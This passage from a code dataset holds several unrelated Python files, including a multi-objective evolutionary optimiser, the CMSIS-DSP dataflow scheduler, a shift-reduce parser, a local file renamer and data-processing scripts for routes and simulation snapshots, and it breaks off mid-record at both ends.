0:\n raise ValueError(\"Use Valid Positive Value to Price\", new_price)\n self._price = new_price\n\n\nt = Ticket(30)\nprint(\"Property of Ticket Class\", t.price)\nprint(\"Instance attribute of t\", t._price)\n\nt1 = Ticket(24)\nprint(\"t1 price:\",t1.price)\n\nprint(\"========\")\nt1.update_price(26)\nprint(\"New Price:\", t1.price)\n\nprint(callable(t1.price))\nprint(callable(t1.update_price))","sub_path":"ClassesWork.py","file_name":"ClassesWork.py","file_ext":"py","file_size_in_byte":2252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"281964187","text":"import pandas as pd\nfrom shapely.geometry import Point\nimport numpy as np\nimport math\n\ndef toCartesian(latitude, longitude):\n x = longitude * 70_800\n y = latitude * 111_300\n return Point(x, y)\n\noperace = pd.read_csv(\"data/operaceDEV01_corr.csv\")\npresuny = pd.read_csv(\"data/routes_01.csv\")\npolohy = pd.read_csv(\"data/onesec_all_01.csv\")\n\n\ndef poloha(time):\n near_index = polohy['beat'].sub(time).abs().idxmin()\n return toCartesian(polohy.iloc[near_index][\"locLat\"], polohy.iloc[near_index][\"locLon\"])\n\nj = 0\njizda = np.full(len(operace), math.nan)\nprev_vykladka = np.full(len(operace), math.nan)\nnext_nakladka = np.full(len(operace), math.nan)\nprev_nakladka = np.full(len(operace), math.nan)\nnext_vykladka = np.full(len(operace), math.nan)\nd_next_nakladka = np.full(len(operace), math.nan)\nd_prev_nakladka = np.full(len(operace), math.nan)\n\nfor i in range(len(operace)):\n otime = int(operace.iloc[i][\"cas_real\"] / 1_000 + 0.5)\n opoloha = poloha(otime)\n while True:\n if j == len(presuny):\n break\n if j == 0:\n t0 = presuny.iloc[0][\"beat\"] - 120\n else:\n t0 = presuny.iloc[j-1][\"end_beat\"]\n poloha0 = poloha(t0)\n t1 = presuny.iloc[j][\"beat\"]\n poloha1 = poloha(t1)\n t2 = presuny.iloc[j][\"end_beat\"]\n poloha2 = poloha(t2)\n if t0 <= otime <= t1:\n if t1-otime < 300:\n jizda[i] = j\n prev_vykladka[i] = t0 - otime\n next_nakladka[i] = t1 - otime\n d_next_nakladka[i] = opoloha.distance(poloha1)\n print(f\"OK: {otime-t0} - {t1-otime} [{opoloha.distance(poloha1)}] {i}/{j}\")\n break\n if t1 <= otime <= t2:\n if t2-otime < 300:\n jizda[i] = j\n prev_nakladka[i] = t1 - otime\n next_vykladka[i] = t2 - otime\n d_prev_nakladka[i] = opoloha.distance(poloha1)\n print(f\"--- {otime-t1} [{opoloha.distance(poloha1)}] - {t2-otime} [{opoloha.distance(poloha2)}] {i}/{j}\")\n break\n j += 1\noperace[\"jizda\"] = jizda\noperace[\"prev_vykladka_dt\"] = prev_vykladka\noperace[\"next_nakladka_dt\"] = next_nakladka\noperace[\"prev_nakladka_dt\"] = prev_nakladka\noperace[\"next_vykladka_dt\"] = next_vykladka\noperace[\"next_nakladka_vzdalenost\"] = d_next_nakladka\noperace[\"prev_nakladka_vzdalenost\"] = d_prev_nakladka\noperace.to_csv(\"data/operaceDEV01_s_jizdami.csv\")","sub_path":"event_binder.py","file_name":"event_binder.py","file_ext":"py","file_size_in_byte":2443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"197761145","text":"#!/usr/bin/env python3#########################################################\n# -*- coding: utf-8 -*-########################################################\n# File : moead_continuous.py\n# Author : tainzhi\n# Mail : qfq61@qq.com\n# Created : 2017-05-22 16:01:46\n# Modified : 2017-06-28 21:55:40\n# Description :\n# #############################################################################/\n\nimport random\nimport math\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nimport problem\nimport algorithm\nfrom individual import *\nfrom population import Population\n\n\nclass MOEAD(algorithm.Algorithm):\n\n description = \"MOEAD\"\n\n def __init__(self, prob,\n generation=100,\n neighbour_size=20,\n crossover_probability=0.9,\n mutate_probability=0.1,\n approach=0):\n\n self.prob = prob\n self.population_size = self.prob.population_size\n self.neighbour_size = neighbour_size\n self.generation = generation\n self.crossover_probability = crossover_probability\n self.approach = approach # 0 weighted sum decomposition approach\n # 1 tchebycheff decomposition approach\n # 2 normalized tchebycheff approach\n # 3 boundary intersection approach\n self.weight_vector_seed = self.prob.weight_vector_seed\n self.lambda_ = np.zeros((prob.objecti_size, self.population_size))\n self.population = Population(prob, self.population_size)\n self.neighbour = np.zeros(\n (neighbour_size, self.population_size), dtype=int)\n\n def init_weight_vector(self):\n if self.prob.objecti_size == 2:\n cnt = 0\n for i in range(self.weight_vector_seed + 1):\n a = 1.0 * i / self.weight_vector_seed\n self.lambda_[:, cnt] = np.array((a, 1 - a))\n cnt += 1\n elif self.prob.objecti_size == 3:\n cnt = 0\n for i in range(self.weight_vector_seed + 1):\n for j in range(self.weight_vector_seed + 1 - i):\n self.lambda_[\n :,\n cnt] = np.array(\n (i / self.weight_vector_seed,\n j / self.weight_vector_seed,\n (self.weight_vector_seed - i - j) / self.weight_vector_seed))\n cnt += 1\n\n def init_neighbour(self):\n for i in range(self.population_size):\n dist = [0.0 for j in range(self.population_size)]\n index = [j for j in range(self.population_size)]\n for j in range(self.population_size):\n dist[j] = np.linalg.norm(\n self.lambda_[:, i] - self.lambda_[:, j])\n dist, index = list(zip(*sorted(zip(dist, index))))\n # print(list(zip(dist, index))[0:3])\n self.neighbour[:, i] = np.array(index[0:self.neighbour_size])\n\n def scalar_function(self, individual, lambda_):\n \"\"\"\n individual: type Individual\n lambda_: type numpy.ndarray(2,1)\n \"\"\"\n for i in range(self.prob.objecti_size):\n if lambda_[i] == 0:\n lambda_[i] = 0.0001\n if self.approach == 0:\n # weighted sum approach\n return np.dot(individual.objecti, lambda_)\n elif self.approach == 1:\n # tchebycheff approach\n return np.max(\n lambda_ *\n np.fabs(\n individual.objecti -\n self.population.reference_objecti))\n elif self.approach == 2:\n # normalized tchebycheff approach\n return np.max(lambda_ * np.fabs((individual.objecti - self.population.reference_objecti) / (self.population.max_objecti - self.population.reference_objecti)))\n else:\n # penalty-based boundary intersection approach: approach index is 3\n f = np.array((individual.objecti))\n z = np.array((self.population.reference_objecti))\n d1 = np.dot(f - z, lambda_) / np.linalg.norm(lambda_)\n d2 = np.linalg.norm(f - (z + d1 * lambda_))\n return d1 + 10 * d2\n\n def update_neighbour(self, individual_index, individual):\n for i in range(self.neighbour_size):\n k = self.neighbour[i, individual_index]\n f1 = self.scalar_function(\n self.population.individuals[k],\n self.lambda_[\n :,\n k])\n f2 = self.scalar_function(individual, self.lambda_[:, k])\n if f2 < f1:\n self.population.individuals[k] = individual\n\n def evolution(self):\n generation = 0\n self.population.update_reference()\n self.init_weight_vector()\n self.init_neighbour()\n while generation < self.generation:\n print((\"MOEA/D generation=%d\" % generation))\n for i in range(self.population_size):\n parent = np.random.choice(\n self.neighbour[:, i], 2, replace=False)\n # print(self.neighbour[:,i])\n child = self.de_crossover(self.population.individuals[i],\n self.population.individuals[parent[0]],\n self.population.individuals[parent[1]])\n self.polynomial_mutate(child)\n self.population.update_reference(child)\n # print(self.population.reference_objecti)\n self.update_neighbour(i, child)\n generation += 1\n self.save_result()\n\n\ndef main():\n prob = problem.DTLZ1()\n # prob.plot_pareto_front()\n alo = MOEAD(prob, approach=1, generation=100)\n alo.evolution()\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"MOEA_continuous/moead.py","file_name":"moead.py","file_ext":"py","file_size_in_byte":5797,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"57319526","text":"import os \n\nsearch = 'document'\nreplace = 'file'\nfiletype = '.docx'\nrenamed = 0 \n\ndir_content = os.listdir('.')\ndocs=[doc for doc in dir_content if os.path.isfile(doc)]\n\nprint(f\"{len(docs)} of {len(dir_content)} elements are files \")\n\nfor doc in docs :\n\n filename, fileformat = os.path.splitext(doc)\n\n if fileformat == filetype:\n\n if search in filename:\n \n new_name = filename.replace(search,replace)+filetype\n os.rename(doc,new_name) \n renamed += 1\n print(f\"Renamed {renamed}: {doc} ----> {new_name}\\n\")\n\n","sub_path":"simple bots/py/renaming-self.py","file_name":"renaming-self.py","file_ext":"py","file_size_in_byte":576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"645503365","text":"###########################################\n# Project: CMSIS DSP Library\n# Title: description.py\n# Description: Schedule generation\n# \n# $Date: 29 July 2021\n# $Revision: V1.10.0\n# \n# Target Processor: Cortex-M and Cortex-A cores\n# -------------------------------------------------------------------- */\n# \n# Copyright (C) 2010-2021 ARM Limited or its affiliates. All rights reserved.\n# \n# SPDX-License-Identifier: Apache-2.0\n# \n# Licensed under the Apache License, Version 2.0 (the License); you may\n# not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n# \n# www.apache.org/licenses/LICENSE-2.0\n# \n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an AS IS BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n############################################\n\"\"\"Description of the graph\"\"\"\n\nimport networkx as nx\nimport numpy as np \nfrom sympy import Matrix\nfrom sympy.core.numbers import ilcm,igcd\n\nimport cmsisdsp.sdf.scheduler.graphviz\nimport cmsisdsp.sdf.scheduler.ccode\nimport cmsisdsp.sdf.scheduler.pythoncode\n\nfrom .node import *\nfrom .config import *\nfrom ..types import *\n\n# To debug graph coloring for memory optimization\n#import matplotlib.pyplot as plt\n\nclass IncompatibleIO(Exception):\n pass\n\nclass GraphIsNotConnected(Exception):\n pass\n\nclass NotSchedulableError(Exception):\n pass\n\nclass DeadlockError(Exception):\n pass\n\nclass CannotDelayConstantError(Exception):\n pass\n\nclass FifoBuffer:\n \"\"\"Buffer used by a FIFO\"\"\"\n def __init__(self,bufferID,theType,length):\n self._length=length \n self._theType=theType \n self._bufferID=bufferID\n\nclass FIFODesc:\n \"\"\"A FIFO connecting two nodes\"\"\"\n def __init__(self,fifoid):\n # The FIFO is in fact just an array\n self.isArray=False \n # FIFO length\n self.length=0\n # FIFO type\n self.theType=None \n # Buffer used by FIFO\n self.buffer=None \n # Used for plot in graphviz\n self.bufferID=-1\n self._fifoID=fifoid \n # Source IO\n self.src = None \n # Dest IO\n self.dst = None \n # FIFO delay\n self.delay=0\n\n # Used for liveliness analysis\n # To share buffers between FIFO in memory optimization\n # mode, we need to know when a FIFO is in use.\n # We compute the maximum extent : so the biggest interval\n # and not a disconnected union of intervals\n # This could be improved. We could use\n # a disjoint union of intervals but they should be mapped\n # to the same node in the interference graph\n self._liveInterval=(-1,-1)\n\n # shared buffer number not yet allocated\n self.sharedNB=-1\n\n # For c code generation \n @property\n def isArrayAsInt(self):\n if self.isArray:\n return(1)\n else:\n return(0)\n\n @property\n def hasDelay(self):\n return(self.delay>0)\n\n def dump(self):\n \n print(\"array %d len %d %s id %d src %s:%s dst %s:%s \" % \n (self.isArray,\n self.length,\n self.theType.ctype,\n self.fifoID,\n self.src.owner.nodeID,\n self.src.name,\n self.dst.owner.nodeID,\n self.dst.name))\n\n @property\n def fifoID(self):\n return self._fifoID\n \n def recordWrite(self,theTime):\n start,stop=self._liveInterval \n if start==-1:\n self._liveInterval=(theTime,stop)\n\n def recordRead(self,theTime):\n start,stop=self._liveInterval \n if (theTime > stop):\n self._liveInterval=(start,theTime)\n\n\ndef analyzeStep(vec,allFIFOs,theTime):\n \"\"\"Analyze an evolution step to know which FIFOs are read and written to\"\"\"\n fifoID = 0 \n for fifo in (vec > 0):\n if fifo:\n allFIFOs[fifoID].recordWrite(theTime) \n fifoID = fifoID + 1\n\n fifoID = 0 \n for fifo in (vec < 0):\n if fifo:\n allFIFOs[fifoID].recordRead(theTime) \n fifoID = fifoID + 1\n\nclass Graph():\n\n def __init__(self):\n self._nodes={}\n self._edges={}\n self._delays={}\n self._constantEdges={}\n self._g = nx.Graph()\n self._sortedNodes=None\n self._totalMemory=0\n self._allFIFOs = None \n self._allBuffers = None\n\n def connect(self,nodea,nodeb):\n # When connecting to a constant node we do nothing\n # since there is no FIFO in this case\n # and it does not participate to the scheduling.\n if (isinstance(nodea,Constant)):\n nodeb.constantNode = nodea\n self._constantEdges[(nodea,nodeb)]=True\n else:\n if nodea.compatible(nodeb):\n self._sortedNodes = None\n self._sortedEdges = None\n self._g.add_edge(nodea.owner,nodeb.owner)\n \n nodea.fifo = (nodea,nodeb) \n nodeb.fifo = (nodea,nodeb)\n self._edges[(nodea,nodeb)]=True\n if not (nodea.owner in self._nodes):\n self._nodes[nodea.owner]=True\n if not (nodeb.owner in self._nodes):\n self._nodes[nodeb.owner]=True\n else:\n raise IncompatibleIO\n\n def connectWithDelay(self,nodea,nodeb,delay):\n # We cannot connect with delay to a constant node\n if (isinstance(nodea,Constant)):\n raise CannotDelayConstantError\n else:\n self.connect(nodea,nodeb)\n self._delays[(nodea,nodeb)] = delay\n \n def __str__(self):\n res=\"\"\n for (a,b) in self._edges: \n nodea = a.owner\n nodeb = b.owner \n\n res += (\"%s.%s -> %s.%s\\n\" % (nodea.nodeID,a.name, nodeb.nodeID,b.name))\n\n return(res)\n\n def initializeFIFODescriptions(self,config,allFIFOs, fifoLengths,maxTime):\n \"\"\"Initialize FIFOs datastructure\"\"\" \n for fifo in allFIFOs:\n edge = self._sortedEdges[fifo.fifoID]\n fifo.length = fifoLengths[fifo.fifoID]\n src,dst = edge\n fifo.src=src\n fifo.dst=dst \n fifo.delay=self.getDelay(edge)\n # When a FIFO is working as an array then its buffer may\n # potentially be shared with other FIFOs workign as arrays\n if src.nbSamples == dst.nbSamples:\n if fifo.delay==0:\n fifo.isArray = True \n fifo.theType = src.theType\n #fifo.dump()\n\n\n bufferID=0\n allBuffers=[]\n\n # Compute a graph describing when FIFOs are used at the same time\n # The use graph coloring to allocate buffer to those FIFOs.\n # Then size the buffer based on the longest FIFO using it\n if config.memoryOptimization:\n G = nx.Graph()\n\n for fifo in allFIFOs: \n if fifo.isArray:\n G.add_node(fifo)\n\n # Create the interference graph\n\n # Dictionary of active FIFOs at a given time.\n # The time is a scheduling step\n active={}\n currentTime=0\n while currentTime<=maxTime:\n # Remove fifo no more active.\n # Thei stop time < currenTime\n toDelete=[]\n for k in active:\n start,stop=k._liveInterval \n if stop node -> dst\n # At time t, node will read for src and the stop time\n # will be currentTime t.\n # And it will write to dst and the start time will be\n # currentTime\n # So, src and dst are both live at this time.\n # Which means the condition on the stop time must be \n # stop >= currentTime and not a strict comparison\n if start<=currentTime and stop >= currentTime:\n if not (fifo in active):\n for k in active:\n G.add_edge(k,fifo)\n active[fifo]=True \n \n currentTime = currentTime + 1\n\n # To debug and display the graph\n if False:\n labels={}\n for n in G.nodes:\n labels[n]=\"%s -> %s\" % (n.src.owner.nodeName,n.dst.owner.nodeName)\n \n pos = nx.spring_layout(G, seed=3113794652)\n subax1 = plt.subplot(121)\n nx.draw_networkx_edges(G, pos, width=1.0, alpha=0.5)\n \n nx.draw_networkx_labels(G, pos, labels, font_size=10)\n plt.show()\n quit()\n\n \n # Graph coloring\n d = nx.coloring.greedy_color(G, strategy=\"largest_first\")\n\n # Allocate the colors (buffer ID) to the FIFO\n # and keep track of the max color number\n # Since other buffers (for real FIFOs) will have their\n # numbering start after this one.\n for fifo in d:\n fifo.sharedNB=d[fifo]\n bufferID=max(bufferID,fifo.sharedNB)\n\n\n\n # Compute the max size for each shared buffer\n maxSizes={} \n for fifo in d:\n lengthInBytes = fifo.theType.bytes * fifo.length\n if fifo.sharedNB in maxSizes:\n maxSizes[fifo.sharedNB] = max(maxSizes[fifo.sharedNB],lengthInBytes) \n else:\n maxSizes[fifo.sharedNB]=lengthInBytes\n\n # Create the buffers\n for theID in maxSizes:\n sharedA = FifoBuffer(theID,CType(UINT8),maxSizes[theID])\n allBuffers.append(sharedA)\n\n for fifo in allFIFOs:\n # Use shared buffer if memory optimization\n if fifo.isArray and config.memoryOptimization:\n fifo.buffer=allBuffers[fifo.sharedNB] \n fifo.bufferID=fifo.sharedNB\n # Create a new buffer for a real FIFO\n # Use bufferID which is starting after the numbers allocated\n # to shared buffers\n else:\n buf = FifoBuffer(bufferID,fifo.theType,fifo.length)\n allBuffers.append(buf)\n fifo.buffer=buf\n fifo.bufferID = bufferID\n bufferID = bufferID + 1\n\n # Compute the total memory used in bytes\n self._totalMemory = 0\n for buf in allBuffers:\n self._totalMemory = self._totalMemory + buf._theType.bytes * buf._length\n\n #for fifo in allFIFOs:\n # fifo.dump()\n return(allBuffers)\n\n\n\n\n @property\n def constantEdges(self):\n return list(self._constantEdges.keys())\n \n @property\n def nodes(self):\n return list(self._nodes.keys())\n\n @property\n def edges(self):\n return list(self._edges.keys())\n \n\n def hasDelay(self,edge):\n return(edge in self._delays)\n\n def getDelay(self,edge):\n if self.hasDelay(edge):\n return(self._delays[edge])\n else:\n return(0)\n\n def checkGraph(self):\n if not nx.is_connected(self._g):\n raise GraphIsNotConnected\n\n def topologyMatrix(self):\n self.checkGraph()\n rows=[]\n # This is used in schedule generation\n # and all functions must use the same node ordering\n self._sortedNodes = sorted(self.nodes, key=lambda x: x.nodeID)\n # Arbitrary order but used for now\n self._sortedEdges = self.edges.copy()\n #for x in self._sorted:\n # print(x.nodeID)\n\n for edge in self._sortedEdges: \n na,nb = edge\n currentRow=[0] * len(self._sortedNodes) \n\n ia=self._sortedNodes.index(na.owner)\n ib=self._sortedNodes.index(nb.owner)\n\n # Produced by na on the edge\n currentRow[ia] = na.nbSamples\n\n # Consumed by nb on the edge\n currentRow[ib] = -nb.nbSamples\n\n rows.append(currentRow)\n\n return(np.array(rows))\n\n def nullVector(self):\n m = self.topologyMatrix()\n r=Matrix(m).nullspace()\n if len(r) != 1:\n raise NotSchedulableError\n result=list(r[0])\n denominators = [x.q for x in result]\n # Remove denominators\n ppcm = ilcm(*denominators)\n #print(ppcm)\n intValues = [x * ppcm for x in result]\n # Convert intValues to the smallest possible values\n gcd = igcd(*intValues)\n return([x / gcd for x in intValues])\n\n @property\n def initEvolutionVector(self):\n \"\"\"Initial FIFO state taking into account delays\"\"\"\n return(np.array([self.getDelay(x) for x in self.edges]))\n\n def evolutionVectorForNode(self,nodeID):\n \"\"\"Return the evolution vector corresponding to a selected node\"\"\"\n v = np.zeros(len(self._sortedNodes))\n v[nodeID] = 1 \n return(v)\n\n def computeSchedule(self,config=Configuration()):\n # Init values\n initB = self.initEvolutionVector\n initN = self.nullVector()\n\n # Current values (copys)\n b = np.array(initB)\n n = np.array(initN)\n\n if config.displayFIFOSizes:\n for edge in self._sortedEdges:\n print(\"%s:%s -> %s:%s\" % (edge[0].owner.nodeID,edge[0].name,edge[1].owner.nodeID,edge[1].name))\n print(b)\n\n # Topology matrix\n t = np.array(self.topologyMatrix())\n\n # Define the list of FIFOs objects\n nbFIFOS = t.shape[0]\n allFIFOs = [] \n for i in range(nbFIFOS):\n allFIFOs.append(FIFODesc(i))\n\n # Normalization vector\n normV = 1.0*np.apply_along_axis(abs,1,t).max(axis=1)\n\n # bMax below is used to track maximum FIFO size \n # occuring during a run of the schedule\n #\n # The heuristric is:\n #\n # First we compute on each edge the maximum absolute value\n # It is the minimum amount of data an edge must contain\n # for the system to work either because it is produced\n # by a node or consumed by another.\n # We use this value as an unit of measurement for the edge.\n # So, we normalize the FIFO lengths by this size.\n # If this occupancy number is > 1 then it means\n # that enough data is available on the FIFO for the\n # consumer to consume it.\n # When we select a node for scheduling later we try\n # to minimize the occupancy number of all FIFOs by\n # selecting the schedulign which is giving the\n # minimum maximum occupancy number after the run.\n bMax = 1.0*np.array(initB) / normV\n\n\n schedule=[]\n\n zeroVec = np.zeros(len(self._sortedNodes))\n evolutionTime = 0\n # While there are remaining nodes to schedule\n while (n != zeroVec).any():\n # Look for the best mode to schedule\n # which is the one giving the minimum FIFO increase\n \n # None selected\n selected = -1\n\n # Min FIFO size found\n minVal = 10000000\n nodeID = 0\n for node in self._sortedNodes:\n # If the node can be scheduled\n if n[nodeID] > 0:\n # Evolution vector if this node is selected\n v = self.evolutionVectorForNode(nodeID)\n # New fifos size after this evolution\n newB = np.dot(t,v) + b\n\n # Check that there is no FIFO underflow:\n if np.all(newB >= 0):\n # Total FIFO size for this possible execution\n # We normalize to get the occupancy number as explained above\n theMin = (1.0*np.array(newB) / normV).max()\n # If this possible evolution is giving smaller FIFO size\n # (measured in occupancy number) then it is selected\n if theMin <= minVal:\n minVal = theMin\n selected = nodeID \n\n nodeID = nodeID + 1\n\n # No node could be scheduled because of not enough data\n # in the FIFOs. It should not occur if there is a null\n # space of dimension 1. So, it is probably a bug if\n # this exception is raised\n if selected < 0:\n raise DeadlockError\n # Now we have evaluated all schedulable nodes for this run\n # and selected the one giving the smallest FIFO increase\n\n # Real evolution vector for selected node\n evol = self.evolutionVectorForNode(selected)\n # Keep track that this node has been schedule\n n = n - evol\n # Compute new fifo state\n fifoChange = np.dot(t,evol)\n b = fifoChange + b\n\n if config.displayFIFOSizes:\n print(b)\n \n bMax = np.maximum(b,bMax)\n schedule.append(selected)\n\n # Analyze FIFOs to know if a FIFOs write is\n # followed immediately by a FIFO read of same size\n analyzeStep(fifoChange,allFIFOs,evolutionTime)\n evolutionTime = evolutionTime + 1\n\n fifoMax=np.floor(bMax).astype(np.int32)\n \n allBuffers=self.initializeFIFODescriptions(config,allFIFOs,fifoMax,evolutionTime)\n self._allFIFOs = allFIFOs \n self._allBuffers = allBuffers\n return(Schedule(self,self._sortedNodes,self._sortedEdges,schedule))\n\n\nclass Schedule:\n def __init__(self,g,sortedNodes,sortedEdges,schedule):\n self._sortedNodes=sortedNodes\n self._sortedEdges=sortedEdges\n self._schedule = schedule \n self._graph = g\n # Nodes containing pure functions (no state) like some\n # CMSIS-DSP functions.\n # When scheduling is using the option codeArray, the\n # schedule is encoded as an array.\n # Function calls cannot be inlined anymore and we need\n # to create new nodes for those function calls.\n # The pureNode structure is done for this.\n # It is a record because we want to reuse nodes for same\n # types.\n self._pureNodes={}\n nodeCodeID = 0\n pureClassID = 1\n for n in self.nodes:\n n.codeID = nodeCodeID\n nodeCodeID = nodeCodeID + 1\n # Constant nodes are ignored since they have\n # no arcs, and are connected to no FIFOs\n theArgs=[] \n theArgTypes=[]\n i,o=n.allIOs()\n for io in i:\n # An io connected to a constant node has no fifo \n if not io.fifo is None:\n theArgs.append(self.fifoID(io.fifo))\n theArgTypes.append(io.ctype)\n else:\n # Instead the arg is the name of a constant node\n # instead of being a fifo ID\n theArgs.append(io.constantNode.name)\n theArgTypes.append(io.constantNode.name)\n for io in o:\n theArgs.append(self.fifoID(io.fifo))\n theArgTypes.append(io.ctype)\n n.args=theArgs\n\n # Analyze the nature of arguments for pure functions\n # The information created during this analysis\n # is useful when generating a class containing the\n # pure function\n if not n.hasState:\n theType=(n.nodeName,tuple(theArgTypes))\n if not theType in self._pureNodes:\n self._pureNodes[theType]=n\n n.pureClassID = pureClassID \n pureClassID = pureClassID + 1\n else:\n n.pureClassID = self._pureNodes[theType].pureClassID\n n.pureNodeType=theType\n n.analyzeArgs()\n\n def hasDelay(self,edge):\n return(self._graph.hasDelay(edge))\n\n def getDelay(self,edge):\n return(self._graph.getDelay(edge))\n\n @property\n def pureNodes(self):\n return self._pureNodes\n \n\n @property\n def constantEdges(self):\n return self._graph.constantEdges\n\n @property\n def nodes(self):\n return self._sortedNodes\n\n @property\n def edges(self):\n return self._sortedEdges\n\n @property\n def schedule(self):\n return self._schedule\n\n #@property\n #def fifoLengths(self):\n # return self._fifos\n\n @property \n def scheduleLength(self):\n return len(self.schedule)\n\n @property \n def memory(self):\n #theBytes=[x[0].theType.bytes for x in self.edges]\n #theSizes=[x[0]*x[1] for x in zip(self.fifoLengths,theBytes)]\n #return(np.sum(theSizes))\n return(self._graph._totalMemory)\n\n @property\n def graph(self):\n return self._graph\n\n def fifoID(self,edge):\n return(self.edges.index(edge))\n\n def outputFIFOs(self,node):\n outs=[]\n for io in node.outputNames:\n x = node._outputs[io]\n fifo=(self.fifoID(x.fifo),io)\n outs.append(fifo)\n \n return(outs)\n\n def ccode(self,directory,config=Configuration()):\n \"\"\"Write graphviz into file f\"\"\" \n cmsisdsp.sdf.scheduler.ccode.gencode(self,directory,config)\n\n def pythoncode(self,directory,config=Configuration()):\n \"\"\"Write graphviz into file f\"\"\" \n cmsisdsp.sdf.scheduler.pythoncode.gencode(self,directory,config)\n\n def graphviz(self,f,config=Configuration()):\n \"\"\"Write graphviz into file f\"\"\" \n cmsisdsp.sdf.scheduler.graphviz.gengraph(self,f,config)\n \n \n \n ","sub_path":"CMSIS/DSP/cmsisdsp/sdf/scheduler/description.py","file_name":"description.py","file_ext":"py","file_size_in_byte":22386,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"125942032","text":"from pygadgetreader import *\nimport numpy as np\n\nimport sys\nsys.path.insert(0, '/home/hungjinh/Research/baryon_proj/code')\nfrom cal_Pk_tool_MBII import *\n\n\n\ntemp_save_dir=\"/home/hungjinh/Research/baryon_proj/code/temp_storage/MBII_baryon_MassCube1024/\"\n\nbasePath= '/physics/nkhandai/mb2/snapdir/'\n\nsnap=85\nNsubfiles=1024\nboxsize=100. # comoving Mpc/h\nresol = 1024\nVbox=boxsize**3\n\n\ngas_mass_cube =build_mass_cube(snap,basePath,'gas',boxsize,resol,Nsubfiles)\n\nnp.save(temp_save_dir+\"MBII_baryon_MassCube1024_gas.npy\", gas_mass_cube)","sub_path":"large_job/old_code/gen_mass_cube_MBII_baryon_gas.py","file_name":"gen_mass_cube_MBII_baryon_gas.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"341373109","text":"class ShiftReduceParser:\n SHIFT = 'SHIFT'\n REDUCE = 'REDUCE'\n OK = 'OK'\n \n def __init__(self, G, verbose=False):\n self.G = G\n self.verbose = verbose\n self.action = {}\n self.goto = {}\n self._build_parsing_table()\n \n def _build_parsing_table(self):\n raise NotImplementedError()\n\n def __call__(self, w):\n stack = [ 0 ] #S \n cursor = 0\n output = []\n operations = []\n \n while True:\n state = stack[-1]\n lookahead = w[cursor].token_type\n if self.verbose: print(stack, '<---||--->', w[cursor:])\n try:\n action, tag = self.action[state, lookahead]\n if action == self.SHIFT:\n operations.append(\"SHIFT\")\n stack.append(tag)\n cursor += 1\n elif action == self.REDUCE:\n operations.append(\"REDUCE\")\n l = len(tag.Right)\n while l > 0:\n stack.pop()\n l -= 1\n output.append(tag)\n last = stack[-1]\n stack.append(self.goto[last, tag.Left])\n elif action == self.OK:\n return output, operations, True\n else:\n return \"Error! Action Table Conflict\", operations, False\n except KeyError:\n s = pprint_w(w[:(cursor + 1)])\n #print(\"Lookahead\", lookahead)\n return f\"Error! String does not match Grammars generated language: \\n {s}\", operations, False\n\n @staticmethod\n def _register(table, key, value, conflict_type: dict):\n if key in table and table[key] != value:\n if table[key][0] == 'SHIFT' and value[0] == 'REDUCE' or table[key][0] == 'REDUCE' and value[0] == 'SHIFT':\n conflict_type[key] = \"SHIFT-REDUCE\"\n\n elif table[key][0] == value[0] == 'REDUCE':\n conflict_type[key] = \"REDUCE-REDUCE\"\n\n else: conflict_type[key] = \"Fuiste Engannado\"\n #assert key not in table or table[key] == value, 'Shift-Reduce or Reduce-Reduce conflict!!!'\n else: \n table[key] = value\n\ndef conflict_chain(p):\n q = [(0, [0], \"\")]\n visited = set()\n while len(q) > 0: \n state, s_state, chain = q.pop()\n for t in p.G.terminals + [p.G.EOF]:\n s_copy = s_state.copy()\n chain += str(t)\n if (state, t) in p.conflictType:\n print(\"Conflictt\")\n return chain, p.conflictType[state, t]\n try:\n action, tag = p.action[state, t]\n except KeyError: continue\n\n new_state = None\n if action == p.SHIFT:\n new_state = tag\n elif action == p.REDUCE:\n l = len(tag.Right)\n while l > 0:\n s_copy.pop()\n l -= 1\n last = s_copy[-1]\n new_state = p.goto[last, tag.Left]\n elif action == p.OK: continue\n else: return \"\", \"\"\n if new_state not in visited:\n s_copy.append(new_state)\n q.append((new_state, s_copy, chain))\n visited.add(new_state)\n return \"\", \"\"\n\ndef pprint_w(tokens):\n indent = 0\n pending = []\n s = \"\"\n for token in tokens:\n pending.append(token.lex)\n if token.lex in { \"{\", \"}\", \";\" }:\n if token.lex == \"}\":\n indent -= 1\n s += (' '*indent + ' '.join(str(t) for t in pending))\n s += \"\\n\"\n pending.clear()\n if token.lex == \"{\":\n indent += 1\n s += (' '.join([str(t) for t in pending]))\n return s","sub_path":"cmp/tools/shift_reduce_parser.py","file_name":"shift_reduce_parser.py","file_ext":"py","file_size_in_byte":3821,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"456182488","text":"#/usr/bin/python3\nimport pymysql\nimport datetime\nimport sys\n\nred = \"\\033[1;38m\"\ngreen = \"\\033[1;32m\"\nend = \"\\033[1;m\"\n\n\nbikes = [\"0587\",\"0603\",\"0636\",\"0657\",\"0665\",\"0669\",\"1210\",\"1473\",\"2910\",\"3014\",\"3215\",\"3410\",\"3469\",\"4381\",\"5233\",\"5432\",\"6089\",\"6097\",\"6473\",\"6904\",\"6994\",\"7303\",\"7459\",\"7517\",\"7710\",\"8508\",\"8664\",\"8870\",\"9050\",\"9407\",\"9519\"]\n\ntoday = datetime.datetime.now()\nif(len(sys.argv) == 1):\n time1 = \"2015-05-00 00:00:00\"\n time2 = str(today.year) + \"-\" + str(today.month) + \"-\" + str(today.day) + \" 00:00:00\"\nelif(len(sys.argv) == 2):\n time1 = sys.argv[1][0:4] + \"-\" + sys.argv[1][4:6] + \"-00 00:00:00\"\n time2 = str(today.year) + \"-\" + str(today.month) + \"-\" 